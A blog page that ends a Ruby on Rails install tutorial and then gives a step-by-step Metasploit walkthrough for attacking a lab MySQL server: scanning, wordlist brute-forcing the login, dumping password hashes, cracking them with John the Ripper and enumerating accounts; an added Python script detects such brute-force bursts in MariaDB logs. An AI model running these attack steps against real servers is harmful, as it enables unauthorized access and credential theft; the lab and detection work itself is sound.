<span style="font-family: inherit;">[shabbir@compute1~]$ <b>sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel</b></span></div>
<br />
<br />
2) Install rbenv. Note that the clone URLs below use the git:// transport, which is neither encrypted nor authenticated; the same repositories are reachable over https://, which authenticates the server.<br />
<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>git clone git://github.com/sstephenson/rbenv.git .rbenv</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'eval "$(rbenv init -)"' >> ~/.bash_profile</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>exec $SHELL</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' <span style="font-family: inherit;">>></span> ~/.bash_profile</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>exec $SHELL</b></span></div>
<br />
Reboot the machine.<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b><span style="font-family: inherit;">systemctl reboot</span> </b></span></div>
<br />
<br />
<br />
3) Install Ruby <br />
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rbenv install -v 2.2.3</b></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rbenv global 2.2.3</b></span></div>
<br />
<br />
Verify that Ruby was installed properly.<br />
[shabbir@compute1 ~]$ <b>ruby -v</b><br />
ruby 2.2.3p173 (2015-08-18 revision 51636) [x86_64-linux]<br />
<br />
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>echo "gem: --no-document" > ~/.gemrc</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>gem install bundler</b></span></div>
<br />
<br />
<br />
4) Install Rails <br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>gem install rails -v 4.2.4</b></span><br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>rbenv rehash</b></span><span style="font-family: inherit;"> </span><br />
<br />
Verify that Rails was installed properly.<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rails -v</b></span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">Rails 4.2.4</span></div>
5) Install JavaScript Runtime<br />
<div class="result notranslate" style="text-align: left;">
<br />
Install EPEL Repository.<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>sudo yum -y install epel-release</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>sudo yum install nodejs</b></span></div>
<br />
<br />
<br />
6) Install Database <br />
<br />
[shabbir@compute1 ~]$ <b>sudo yum groupinstall mariadb</b><br />
<div class="result notranslate" style="text-align: left;">
<br />
[shabbir@compute1 ~]$ <b>sudo yum install mariadb-devel</b><br />
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>sudo systemctl enable mariadb</b></span></div>
<div class="code-pre " style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>sudo systemctl start mariadb</b><code> </code></span></div>
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ </span><span style="font-family: inherit;"><b>gem install mysql</b></span><br />
[shabbir@compute1 ~]$ <b>rbenv rehash</b><br />
<br />
<br />
<br />
7) Create 'Hello World' Application<br />
<br />
7.1) Create Demo Project<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>rails new demo</b></span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">7.2) Start the Web Server.</span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span><b> cd demo</b> </span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 <span style="font-family: inherit;">demo</span>]$</span> <b>rails server</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br /></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;">7.3) Open a browser and type the following URL. <b>http://localhost:3000</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9gvMKHB6ZIKiJqytboeve8ThM1HzNsO85VJulJabS2T34nmM2ZBhG4-U-XWuNA6QlCY20A2AE28wK3wBx-S76kYvNpavTrqRjfkxxaOn_b_tE03lRk1KbDQ9OOVumoudOhyDWMYpZcTY/s1600/Screenshot+from+2015-11-02+03%253A20%253A41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9gvMKHB6ZIKiJqytboeve8ThM1HzNsO85VJulJabS2T34nmM2ZBhG4-U-XWuNA6QlCY20A2AE28wK3wBx-S76kYvNpavTrqRjfkxxaOn_b_tE03lRk1KbDQ9OOVumoudOhyDWMYpZcTY/s320/Screenshot+from+2015-11-02+03%253A20%253A41.png" width="320" /></a></div>
<br />
<br />
NOTE: To stop the web server, hit Ctrl+C in the terminal window where it's running. <br />
<div class="result notranslate" style="text-align: left;">
<br />
7.4) Create a new controller called "welcome" with an action called "index". <br />
<br />
[shabbir@compute1 demo]$ <b>rails generate controller welcome index</b><br />
create app/controllers/welcome_controller.rb<br />
route get 'welcome/index'<br />
invoke erb<br />
create app/views/welcome<br />
create app/views/welcome/index.html.erb<br />
invoke test_unit<br />
create test/controllers/welcome_controller_test.rb<br />
invoke helper<br />
create app/helpers/welcome_helper.rb<br />
invoke test_unit<br />
invoke assets<br />
invoke coffee<br />
create app/assets/javascripts/welcome.coffee<br />
invoke scss<br />
create app/assets/stylesheets/welcome.scss<br />
<br />
<br />
<br />
<div style="text-align: left;">
The controller, is located at
<span style="font-family: inherit;"><code>app/controllers/welcome_controller.rb</code></span> and the view, located at
<code>app/views/welcome/index.html.erb</code>.</div>
<br />
<br />
7.5) Edit the View.<br />
<br />
[shabbir@compute1 demo]$ <b>vi app/views/welcome/index.html.erb </b><br />
<br />
<b><h1>Hello, World!</h1></b><br />
<br />
<br />
<br />
7.6) Now that we have made the controller and view, we need to tell Rails when we
want "Hello, World!" to show up. In our case, we want it to show up when we
navigate to the root URL of our site, <a href="http://localhost:3000/">http://localhost:3000</a>. At the moment,
"Welcome aboard" is occupying that spot.<br />
<br />
Edit the application's routing file. <br />
[shabbir@compute1 demo]$ <b>vi config/routes.rb </b><br />
<br />
Uncomment the following line <br />
<b> root 'welcome#index'</b><br />
<br />
<br />
<span style="font-family: inherit;">7.7) Ensure that the web server is running. Open a browser and type the following URL. <b>http://localhost:3000</b> </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WOMimtctHnUjd2yVdd2Y9z5_6b7z0QhHBd4RTrJ9CR1PhinMAwIPmKquNaqSPPkWfNu4fJLkxEaR6MmdK8fsTQTYIP5E5hNyAZRH8MfvPda8RF4LA0pH-USwyDoutXxHy8G8HORbDFlB/s1600/Screenshot+from+2015-11-02+15%253A54%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WOMimtctHnUjd2yVdd2Y9z5_6b7z0QhHBd4RTrJ9CR1PhinMAwIPmKquNaqSPPkWfNu4fJLkxEaR6MmdK8fsTQTYIP5E5hNyAZRH8MfvPda8RF4LA0pH-USwyDoutXxHy8G8HORbDFlB/s320/Screenshot+from+2015-11-02+15%253A54%253A43.png" width="320" /></a></div>
<br /></div>
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-83347432730584544952015-06-27T15:49:00.000+05:302015-06-27T17:16:59.676+05:30Hack MySQL Server in RHEL7 using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.<br />
<br />
MySQL Server Name: meru.mycompany.com<br />
MySQL Server IP Address: 192.168.122.1 <br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
<span style="background-color: #fce5cd;">root@kali:~# <b>service postgresql start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting PostgreSQL 9.1 database server: main.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>service metasploit start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit rpc server: prosvc.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit web server: thin.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit worker: worker.</span><br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>msfconsole</b></span><br />
<span style="background-color: #fce5cd;">msf ></span><br />
<br />
<br />
2) <span style="color: blue;">Perform nmap scan on MySQL Server</span>.<br />
<span style="background-color: #fce5cd;">msf > <b>db_nmap -sV 192.168.122.1 -p 3306</b></span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Host is up (0.00034s latency).</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: PORT STATE SERVICE VERSION</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: <span style="color: red;">3306/tcp open mysql MySQL 5.5.35-MariaDB</span></span><br />
<span style="background-color: #fce5cd;">[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .</span><br />
<span style="background-color: #fce5cd;">[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds</span><br />
<br />
<br />
3) <span style="color: blue;">Perform brute force password attack.</span><br />
<span style="background-color: #fce5cd;">msf ><b> use auxiliary/scanner/mysql/mysql_login </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>show options</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Module options (auxiliary/scanner/mysql/mysql_login):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> BLANK_PASSWORDS false no Try blank passwords for all users</span><br />
<span style="background-color: #fce5cd;"> BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_CREDS false no Try each user/password couple stored in the current database</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_PASS false no Add all passwords in the current database to the list</span><br />
<span style="background-color: #fce5cd;"> DB_ALL_USERS false no Add all users in the current database to the list</span><br />
<span style="background-color: #fce5cd;"> PASSWORD no A specific password to authenticate with</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> PASS_FILE no File containing passwords, one per line</span></span><br />
<span style="background-color: #fce5cd;"> Proxies no A proxy chain of format type:host:port[,type:host:port][...]</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOSTS yes The target address range or CIDR identifier<br /> RPORT 3306 yes The target port</span></span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host</span></span><br />
<span style="background-color: #fce5cd;"> THREADS 1 yes The number of concurrent threads</span><br />
<span style="background-color: #fce5cd;"> USERNAME no A specific username to authenticate as</span><br />
<span style="background-color: #fce5cd;"> USERPASS_FILE no File containing users and passwords separated by space, one pair per line</span><br />
<span style="background-color: #fce5cd;"> USER_AS_PASS false no Try the username as the password for all users</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> USER_FILE no File containing usernames, one per line</span></span><br />
<span style="background-color: #fce5cd;"> VERBOSE true yes Whether to print output for all attempts</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt</b></span><br />
<span style="background-color: #fce5cd;">USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</b></span><br />
<span style="background-color: #fce5cd;">PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>set RHOSTS 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOSTS => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b><span style="color: black;">set STOP_ON_SUCCESS true</span></b></span><br />
<span style="background-color: #fce5cd;">STOP_ON_SUCCESS => true</span><br />
<br />
<span style="background-color: #fce5cd;">msf auxiliary(mysql_login) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35</span><br />
<span style="background-color: #fce5cd;">Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><br />
<span style="background-color: #fce5cd;">[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><br />
<span style="background-color: #fce5cd;">[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))</span><br />
<span style="background-color: #fce5cd;">[+] <span style="color: red;">192.168.122.1:3306 MYSQL - Success: 'root:root'</span></span><br />
<span style="background-color: #fce5cd;">[*] Scanned 1 of 1 hosts (100% complete)</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
<br />
<br />
As seen above, we have cracked the login credentials for user '<span style="color: red;">root</span>' with password '<span style="color: red;">root</span>'.<br />
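Seen from the server side, a wordlist run like the one above leaves a burst of failed logins from a single client host in the MariaDB error log. The script below is an added example (not part of this post and not Metasploit code) that flags such bursts; it assumes the server actually logs failed logins (MariaDB: log_warnings=2 or higher) in the 5.5 error-log line format, and the log lines it parses are constructed, not copied from a real server.<br />

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the MariaDB 5.5 error-log format; not from a real server.
# The first six mimic what a wordlist run from 192.168.122.115 produces,
# the last one is a single mistyped password from another host.
SAMPLE_LOG = """\
150627 10:03:41 [Warning] Access denied for user 'anon'@'192.168.122.115' (using password: YES)
150627 10:03:41 [Warning] Access denied for user 'anon'@'192.168.122.115' (using password: YES)
150627 10:03:42 [Warning] Access denied for user 'root'@'192.168.122.115' (using password: YES)
150627 10:03:42 [Warning] Access denied for user 'root'@'192.168.122.115' (using password: YES)
150627 10:03:43 [Warning] Access denied for user 'user'@'192.168.122.115' (using password: YES)
150627 10:03:43 [Warning] Access denied for user 'shabbir'@'192.168.122.115' (using password: NO)
150627 10:15:02 [Warning] Access denied for user 'shabbir'@'192.168.122.50' (using password: YES)
"""

# YYMMDD HH:MM:SS [Warning] Access denied for user 'u'@'h' (using password: YES|NO)
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)' \(using password: (?P<pw>YES|NO)\)"
)


def parse_failed_logins(log_text):
    """Return a list of (timestamp, user, client_host) for every failed login."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other error-log lines are not login failures
        # MariaDB pads single-digit hours with a space; normalise before parsing
        ts = datetime.strptime(" ".join(m.group("ts").split()), "%y%m%d %H:%M:%S")
        events.append((ts, m.group("user"), m.group("host")))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Return {client_host: (max_failures_in_window, distinct_users_tried)}.

    A host is reported when it produces at least `threshold` failures inside any
    sliding `window`. Many distinct usernames from one host in a short time is the
    signature of a wordlist sweep rather than a user mistyping a password.
    """
    by_host = defaultdict(list)
    for ts, user, host in events:
        by_host[host].append((ts, user))

    alerts = {}
    for host, items in by_host.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # shrink the window from the left until it spans at most `window`
            while items[end][0] - items[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                users = {user for _, user in items[start:end + 1]}
                best = alerts.get(host)
                if best is None or count > best[0]:
                    alerts[host] = (count, len(users))
    return alerts


if __name__ == "__main__":
    for host, (count, users) in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)).items():
        print(f"ALERT {host}: {count} failed logins, {users} distinct usernames")
```

On the sample above only 192.168.122.115 is reported (6 failures across 4 usernames in 2 seconds); the lone failure from 192.168.122.50 stays below the threshold.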
<br />
<br />
4) <span style="color: blue;">Capture other user credentials. <span style="color: black;">We will capture the password hashes and then crack them using John the Ripper.</span></span><br />
<br />
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/scanner/mysql/mysql_hashdump </b><br />msf auxiliary(mysql_hashdump) > <b>show options</b><br /><br />Module options (auxiliary/scanner/mysql/mysql_hashdump):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> <span style="color: red;"> PASSWORD no The password for the specified username<br /> RHOSTS yes The target address range or CIDR identifier</span><br /> RPORT 3306 yes The target port<br /> THREADS 1 yes The number of concurrent threads<br /> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_hashdump) > <b>set USERNAME root</b><br />USERNAME => root<br />msf auxiliary(mysql_hashdump) > <b>set PASSWORD root</b><br />PASSWORD => root<br />msf auxiliary(mysql_hashdump) > <b>run</b><br /><br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B<br />[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667<br />[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19<br />[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A<br />[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C<br />[*] Scanned 1 of 1 hosts (100% complete)<br />[*] Auxiliary module execution completed</span><br />
<br />
<br />
Open another terminal window and copy the password hashes to a file 'temp' as shown below.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>vi temp</b></span><br />
<br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667</span><br />
<span style="background-color: #fce5cd;">user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19</span><br />
<span style="background-color: #fce5cd;">anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C</span><br />
<br />
<br />
Run <span style="color: red;">John the Ripper</span> to crack the hashes. <br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>john temp</b></span><br />
<span style="background-color: #fce5cd;">Created directory: /root/.john</span><br />
<span style="background-color: #fce5cd;">Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">root (root)</span><br />
<span style="background-color: #fce5cd;">shabbir (shabbir)</span><br />
<span style="background-color: #fce5cd;">password (user)</span><br />
<span style="background-color: #fce5cd;">princess (anon@localhost)</span><br />
<span style="background-color: #fce5cd;">princess (anon)</span><br />
<span style="background-color: #fce5cd;">princess (anon)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>john temp --show</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">root:root</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">shabbir:shabbir</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">user:password</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon@localhost:princess</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon:princess</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">anon:princess</span></span><br />
<br />
<br />
<br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: white;">5) <span style="color: blue;">Browse MySQL Server.</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/admin/mysql/mysql_enum </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) ><b> show options</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Module options (auxiliary/admin/mysql/mysql_enum):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOST yes The target address</span></span><br />
<span style="background-color: #fce5cd;"> RPORT 3306 yes The target port</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set RHOST 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOST => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set USERNAME root</b></span><br />
<span style="background-color: #fce5cd;">USERNAME => root</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>set PASSWORD root</b></span><br />
<span style="background-color: #fce5cd;">PASSWORD => root</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_enum) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Running MySQL Enumerator...</span><br />
<span style="background-color: #fce5cd;">[*] Enumerating Parameters</span><br />
<span style="background-color: #fce5cd;">[*] MySQL Version: 5.5.35-MariaDB</span><br />
<span style="background-color: #fce5cd;">[*] Compiled for the following OS: Linux</span><br />
<span style="background-color: #fce5cd;">[*] Architecture: x86_64</span><br />
<span style="background-color: #fce5cd;">[*] Server Hostname: meru.mycompany.com</span><br />
<span style="background-color: #fce5cd;">[*] Data Directory: /var/lib/mysql/</span><br />
<span style="background-color: #fce5cd;">[*] Logging of queries and logins: OFF</span><br />
<span style="background-color: #fce5cd;">[*] Old Password Hashing Algorithm OFF</span><br />
<span style="background-color: #fce5cd;">[*] Loading of local files: ON</span><br />
<span style="background-color: #fce5cd;">[*] Logins with old Pre-4.1 Passwords: OFF</span><br />
<span style="background-color: #fce5cd;">[*] Allow Use of symlinks for Database Files: DISABLED</span><br />
<span style="background-color: #fce5cd;">[*] Allow Table Merge: </span><br />
<span style="background-color: #fce5cd;">[*] SSL Connection: DISABLED</span><br />
<span style="background-color: #fce5cd;">[*] Enumerating Accounts:</span><br />
<span style="background-color: #fce5cd;">[*] List of Accounts with Password Hashes:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C</span><br />
<span style="background-color: #fce5cd;">[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!</span><br />
<span style="background-color: #fce5cd;">[*] The following users have GRANT Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
